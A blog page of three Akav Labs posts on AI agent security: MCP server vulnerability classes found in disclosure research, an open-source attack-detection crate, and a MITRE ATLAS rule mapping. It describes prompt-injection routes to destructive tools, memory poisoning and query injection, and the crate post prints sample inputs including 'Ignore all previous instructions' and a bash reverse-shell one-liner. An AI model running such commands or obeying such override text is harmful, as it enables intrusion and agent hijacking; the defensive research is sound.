Forem: AKAVLABS

The MCP Security Crisis: What We Found Hunting Vulnerabilities Across the Ecosystem

AKAVLABS — Tue, 28 Apr 2026 08:36:18 +0000

The MCP Security Crisis: What We Found Hunting Vulnerabilities Across the Ecosystem

By Akav Labs | AgentSentry Research

The Model Context Protocol is quietly becoming the nervous system of enterprise AI. In the span of a few months, every major infrastructure company shipped an MCP server — Microsoft, MongoDB, Auth0, Cloudflare, ClickHouse, Upstash. Enterprises are connecting these servers to their LLM agents and pointing them at production databases, CI/CD pipelines, and authentication systems.

Nobody audited them first.

We spent several days doing systematic security research across the MCP ecosystem. What we found was not a collection of isolated bugs. It was the same classes of vulnerability, reproduced across vendor after vendor, suggesting that the ecosystem shipped fast and security thinking came later. This post documents the attack patterns we identified, the methodology we used, and what we believe needs to change.

We are not naming specific vendors or CVE numbers in this post. Coordinated disclosure windows are active. When those windows close, the full technical advisories will be published. What we can share now is the methodology and the vulnerability classes — which we believe are present across far more MCP servers than the ones we examined.

Background: What MCP Actually Is

For readers who haven't worked with it directly: the Model Context Protocol is a specification from Anthropic that standardizes how LLM agents communicate with external tools and data sources. An MCP server exposes a set of "tools" — functions the agent can call to read data, write data, or trigger actions. The agent decides which tools to call based on what it's trying to accomplish.

The security model is implicit. The agent trusts the tools. The tools trust the agent. The data those tools return flows directly into the agent's context window, where it influences future decisions. There is no sandbox. There is no mandatory validation layer. There is a thin set of protocol-level hints — like destructiveHint, which signals whether a tool should trigger a user confirmation — but these are advisory, not enforced.

This architecture has a fundamental property that security engineers need to internalize: the attack surface is not just the tools themselves, it is everything those tools can read. If a tool fetches a web page, a database record, a pull request description, or a log file, that content enters the agent's context. If an attacker controls that content, they can influence the agent's behavior. This is prompt injection, and it is the master key that makes every other MCP vulnerability exploitable.

The Methodology

We approached this the same way a red team approaches an unfamiliar codebase: systematically, starting broad and narrowing to confirmed exploitability.

Phase 1 — Discovery and triage. We identified official MCP servers from high-value vendors: companies with enterprise customer bases, active bug bounty programs, and MCP implementations that touched sensitive operations. Database servers, CI/CD integrations, identity providers, infrastructure management tools. We cloned each repo and ran automated static analysis — semgrep with custom rules targeting MCP-specific patterns, bandit for Python targets, manual grep for credential handling, URL construction, and query parameterization.

Phase 2 — Pattern identification. Static analysis produces signal, not findings. We reviewed every flag manually, looking for patterns that would be exploitable in a realistic agent deployment. We specifically looked for: unsanitized parameters being interpolated into queries or commands, credential material being returned in tool responses, read-only flags that didn't actually restrict dangerous operations, and missing or incorrect destructiveHint annotations.

Phase 3 — Live verification. This is where many security research workflows stop short, and where we made a deliberate rule for ourselves: no advisory without a confirmed live PoC. We spun up local instances of every target — Docker containers for database servers, real accounts for cloud services, local npm installs for MCP framework libraries. Every finding was tested against a running instance before any disclosure was filed. One finding that looked strong on static analysis failed to reproduce on the current default configuration. We closed it rather than file a finding we couldn't prove.

Phase 4 — Disclosure. GHSA private reporting where available, MSRC portal for Microsoft targets, direct email for vendors without a formal channel. Every disclosure included the vulnerable code location, a reproduction script, and expected output.

The Vulnerability Classes

Across the servers we examined, the same classes of vulnerability appeared repeatedly. We describe them here as patterns, not as vendor-specific findings.

Pattern 1: The destructiveHint Mislabel

The MCP specification includes a destructiveHint field in tool definitions. When set to true, compliant MCP clients — Claude Desktop, Cursor, VS Code Copilot — are supposed to prompt the user before executing the tool. When set to false, the tool executes silently.

We found multiple instances where a tool that performs a genuinely destructive or sensitive operation was annotated with destructiveHint: false. In one case, the mislabeled tool was the only write operation in an entire codebase that creates executable code — every other write operation was correctly annotated. The inconsistency was not random noise. It was a specific tool, doing a specific sensitive thing, with the wrong annotation.

The exploitability of this pattern depends on prompt injection as a prerequisite. If an attacker can influence what content an LLM agent reads — through a malicious web page, a poisoned database record, a crafted pull request description — they can instruct the agent to call the mislabeled tool. Because destructiveHint: false, the MCP client never warns the user. The operation executes silently.

The fix is straightforward: audit every tool's destructiveHint annotation against what the tool actually does. Any tool that creates, modifies, or deletes data — or that triggers an action with real-world consequences — should be annotated true.

Pattern 2: The Read-Only Bypass

Several MCP servers expose a "read-only mode" — a configuration flag or runtime setting that is supposed to restrict the agent to non-destructive operations. The security model relies on this flag to make the server safe for deployment in contexts where the agent shouldn't be able to modify data.

We found multiple cases where the read-only flag did not restrict all dangerous operations. The common failure mode: the flag was implemented by blocking a specific list of write operations, rather than by allowing only a specific list of read operations. The difference matters enormously. A blocklist approach fails when there are operations that aren't writes in the traditional sense but still have dangerous effects — functions that execute arbitrary code, commands that flush entire databases, queries that exfiltrate sensitive data by design.

One particularly clean example: a Redis MCP server marked a command execution tool as readonly: true in its metadata. The tool accepted and executed EVAL (arbitrary Lua code execution) and FLUSHALL (destroys the entire database). Neither is a "write" in the key-value sense, but both are obviously destructive. The read-only flag provided false assurance to anyone who trusted it.

The correct implementation of read-only mode is an allowlist, not a blocklist. Define exactly which operations are permitted in read-only mode. Reject everything else.

Pattern 3: The Elicitation Bypass

The MCP protocol includes an elicitation mechanism — a way for the server to pause tool execution and ask the user a confirmation question. This is a more flexible version of destructiveHint: instead of just flagging a tool as destructive, the server can ask a specific question before proceeding.

We found an implementation where the elicitation function included a fallback: if the MCP client didn't support elicitation (which most clients don't, including Cursor and VS Code), the function returned true and proceeded anyway. The safety mechanism failed open silently. On the majority of MCP clients in production use, the confirmation never happened.

This is a subtle but important failure mode. The code appears to implement a safety check. It does implement a safety check — but only for clients that support the feature. For everyone else, it's a no-op that returns the permissive answer. A developer reading the code would see the elicitation call and reasonably conclude that dangerous operations are gated behind user confirmation. They would be wrong.

Pattern 4: Operator and Query Injection

Multiple database MCP servers accepted raw query parameters that were passed through to the underlying database engine with insufficient validation. The specific mechanisms varied by database: SQL injection via unparameterized query strings, NoSQL operator injection via unsanitized aggregation pipelines, GraphQL injection via string interpolation in query construction.

The NoSQL operator injection case was particularly interesting because it involved operators that execute server-side JavaScript — $where, $function, and $accumulator in MongoDB's aggregation framework. These operators don't just retrieve data; they execute arbitrary JavaScript in the database engine's context. A filter meant to block dangerous aggregation stages checked for $out and $merge (the write operators) but not for the JavaScript execution operators. The check demonstrated awareness that stage filtering was necessary — the wrong stages were filtered.

The GraphQL injection case involved a helper function that was used in some query paths but not others. One function supported parameterized variables; another didn't. A specific tool used the non-parameterized version, interpolating user input directly into the query string. The other tool using the parameterized version worked correctly. The inconsistency was invisible without reading both functions and tracing which one each tool called.

Pattern 5: Credential Exposure via Tool Response

We found at least one case where an MCP tool's stated purpose was to return an API credential to the LLM context. The tool description itself noted that this credential was "not needed" by the server. The credential was returned anyway, making it available to any prompt injection payload that triggered the tool call.

This is a design-level failure rather than an implementation bug. The tool should not exist. Credentials should not flow through the LLM context under any circumstances — they should be used by the server on the client's behalf, not returned to the agent. Any architecture that puts credentials in the LLM's context window should be treated as a potential exfiltration path.

Pattern 6: Spotlighting Coverage Gaps

Microsoft's research team published a technique called "spotlighting" — wrapping tool responses in XML delimiters that clearly mark data as untrusted content, separate from instructions. The idea is to make it harder for prompt injection payloads embedded in data to influence the agent's behavior. Microsoft explicitly recommends this technique in their published guidance on LLM security.

We examined a Microsoft-maintained MCP server and found that spotlighting was implemented in 3 of 91 tools — a 3.3% coverage rate. The 97% gap included exactly the tools most likely to contain attacker-controlled content: pull request descriptions, work item fields, wiki pages, code search results, comments. The tools that were protected were lower-risk read operations. The tools that were unprotected were the ones an attacker would target.

There is a particular irony in finding a spotlighting coverage gap in a server maintained by the team that published the spotlighting technique. It suggests that even when security guidance exists and is understood by the team, the operational challenge of applying it consistently across a large tool surface is significant.

What This Means for the Ecosystem

The pattern across these findings is not that individual developers made careless mistakes. The pattern is that MCP server development is happening faster than MCP security thinking, and the protocol itself does not make secure implementation the path of least resistance.

destructiveHint is advisory. Elicitation support is optional. There is no mandatory input validation layer. There is no standardized way to mark content as untrusted before it enters the agent's context. The protocol gives developers the building blocks for a secure implementation, but it does not prevent an insecure one.

Several things need to change at the ecosystem level:

Standardized security testing for MCP servers. Before an official MCP server ships, it should go through the same kind of review that would be applied to any API handling sensitive operations. The vulnerability classes described in this post are not exotic. They are the same classes that appear in any API security audit. Standard tooling exists to find them.

Mandatory PoC verification before disclosure. This is a lesson we learned ourselves during this research. Static analysis is hypothesis generation. Live verification is confirmation. A finding that looks like a critical vulnerability in source code may not be exploitable in the default configuration. File findings you can prove, not findings you believe.

Spotlighting as a default, not an optimization. Any tool that returns user-controlled content should wrap that content in untrusted-data delimiters. This should be the default behavior in MCP server frameworks, not a technique developers have to know about and apply manually.

Read-only mode as an allowlist. Any MCP server that exposes a read-only configuration should define read-only as an explicit allowlist of permitted operations, not a blocklist of prohibited ones.

What's Next

We are continuing this research. The advisories filed during this research are under coordinated disclosure. When the disclosure windows close — beginning in July 2026 — we will publish the full technical details: vendor names, CVE numbers, PoC scripts, and fix recommendations.

In the meantime, if you are operating an MCP server in a production environment, the questions worth asking are: Do you know which of your tools have incorrect destructiveHint annotations? Does your read-only mode use an allowlist or a blocklist? Does any tool return credential material in its response? Are the tools that read user-controlled content applying any form of untrusted-data marking?

These are not hard questions to answer. They are easy to overlook when you are moving fast.

AgentSentry by Akav Labs is a transparent MCP gateway that applies enforcement policies to agent tool calls before they reach your MCP servers. If you are interested in the research or want to discuss your MCP security posture, reach out at akavlabs@pm.me.

Akav Labs is a security research organization focused on AI agent security. The AgentSentry platform provides runtime protection for MCP deployments. All vendor disclosures in this research were handled under coordinated disclosure principles.

We open-sourced our AI attack detection engine — 97 MITRE ATLAS rules in a Rust crate

AKAVLABS — Mon, 13 Apr 2026 10:42:55 +0000

Today we're publishing atlas-detect — the detection engine that powers AgentSentry's AI attack prevention — as a standalone open-source Rust crate.

→ https://crates.io/crates/atlas-detect

The problem we were solving

When we started building AgentSentry, we needed to answer one question on every LLM API call: is this request an attack?

Not a heuristic guess. Not a vibe check. An actual mapping to the MITRE ATLAS framework — the authoritative catalogue of adversarial techniques targeting AI systems.

MITRE ATLAS has 16 tactics and 111 techniques. We needed to cover as many as possible, in real time, with zero tolerance for false positives on legitimate developer queries.

Here's what that looks like in practice:

"Ignore all previous instructions"          → AML.T0036 (Prompt Injection) — BLOCK
"How do I override a method in Python?"     → nothing — ALLOW  
"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"  → AML.T0057.002 (Reverse Shell) — BLOCK
"Explain how prompt injection works"        → nothing — ALLOW (educational context)

The second and fourth lines are where most detectors fail. We spent significant time on this.

How it works

The engine compiles all 97 detection patterns into a single RegexSet using Rust's regex crate. This means every request is scanned against all rules in one pass — not 97 sequential checks.

use atlas_detect::Detector;

let detector = Detector::new();
let hits = detector.scan("Ignore all previous instructions");

if detector.should_block(&hits) {
    // Returns: ["AML.T0036"]
}

The initial compilation is cached globally via once_cell. After the first call, Detector::new() is free. Scan latency on typical LLM prompts is under 1ms.

The false positive problem

Early versions had a 30% false positive rate. Security education queries like "explain how prompt injection works for my course" were getting blocked alongside actual attacks.

The fix was confidence scoring. When a pattern matches, we compute a confidence score based on:

Base score from severity (Critical = 80, High = 65, Medium = 50...)
+20 if multiple techniques fire together (coordinated attack signal)
+20 if this agent has a high historical block rate
+10 if the message is unusually short (injections tend to be terse)
-25 if educational/research framing is detected

After scoring, we filter by threshold. A medium-severity hit needs 60% confidence to become a block. Critical hits only need 50%.

Result: 0% false positives on a 20-query clean test battery, 100% true positive rate maintained.

What it detects

97 content-detectable techniques across all 16 MITRE ATLAS tactics:

Prompt injection variants (AML.T0036 and sub-techniques)
Jailbreaks — DAN, STAN, roleplay framing, authority impersonation
Credential exfiltration — env var dumps, RAG credential harvesting
Model extraction — weight theft, system prompt extraction
RAG poisoning — embedded instructions in document-like content
Reverse shells and C2 — bash one-liners, PowerShell encoded commands
Multilingual injections — 20+ languages including Cyrillic homoglyphs
Base64/obfuscation evasion — decoded and re-scanned
Deepfake generation requests
Data destruction commands
Denial of service patterns

14 additional ATLAS techniques require behavioral detection (rate limiting, auth pattern analysis) — content regex can't catch them, and atlas-detect is honest about this in the docs.

Why open source this

The detection rules are not our competitive advantage. Anyone determined enough could reconstruct them from the MITRE ATLAS documentation.

Our advantage is the integrated system: the enforcement gateway, agent discovery, incident correlation, topology mapping, per-agent policy engine, and the platform that ties it all together. That stays closed.

But the detection engine is genuinely useful to the Rust community — anyone building an LLM proxy, an AI security tool, or just adding safety checks to an AI application. Publishing it creates goodwill, drives inbound interest in AgentSentry, and positions Akav Labs as contributors to the AI security ecosystem rather than just consumers of it.

Using it in your project

[dependencies]
atlas-detect = "0.1"

With serde for JSON serialization:

atlas-detect = { version = "0.1", features = ["serde"] }

With context for better accuracy:

use atlas_detect::{Detector, ScanContext};

let detector = Detector::new();
let ctx = ScanContext {
    content: user_message.to_string(),
    agent_block_history: get_agent_block_ratio(&agent_id),
    ..Default::default()
};
let hits = detector.scan_with_context(&ctx);

Full documentation at docs.rs/atlas-detect.

What's next

We're working on:

atlas-detect-async — async wrapper for Tokio-based applications
Rule contribution guidelines — the community should be able to add patterns
OWASP Agentic Top 10 coverage alongside MITRE ATLAS
Language model-based detection for evasion-resistant techniques

If you're building something with this, we want to know. Open an issue on github.com/akav-labs/atlas-detect or find us at security@akav.io.

Built by Akav Labs — the team behind AgentSentry, the AI agent security platform.

https://akav.io | https://as.akav.io | https://crates.io/crates/atlas-detect

I mapped all 84 MITRE ATLAS techniques to AI agent detection rules — here's what I found

AKAVLABS — Tue, 31 Mar 2026 19:27:45 +0000

Today Linx Security raised $50M for AI agent identity governance.
It validates the market. But there's a gap nobody is talking about.

Identity governance tells you what agents are allowed to do.

Runtime security tells you what they're actually doing.

MITRE ATLAS documents 84 techniques for attacking AI systems.

Zero commercial products map detection rules to all 84.

I spent the last several months mapping them. The repo is open source,

Sigma-compatible YAML, LangChain coverage live.

The 3 most dangerous techniques right now:

AML.T0054 — Prompt Injection

Agent reads external content containing malicious instructions.

Executes them because it can't distinguish attacker input from task input.

Memory Poisoning

False instructions planted in agent memory activate days later.

The agent's future behavior is controlled by a past attacker.

A2A Relay Attack

Sub-agent receives instructions from a compromised parent.

No mechanism to verify the instruction chain wasn't hijacked.

Detection has to happen at inference time — before execution.

Not after the governance layer logs the completed action.

→ github.com/akav-labs/atlas-agent-rules

Full writeup on the Linx gap here:

→ AgentSentry Research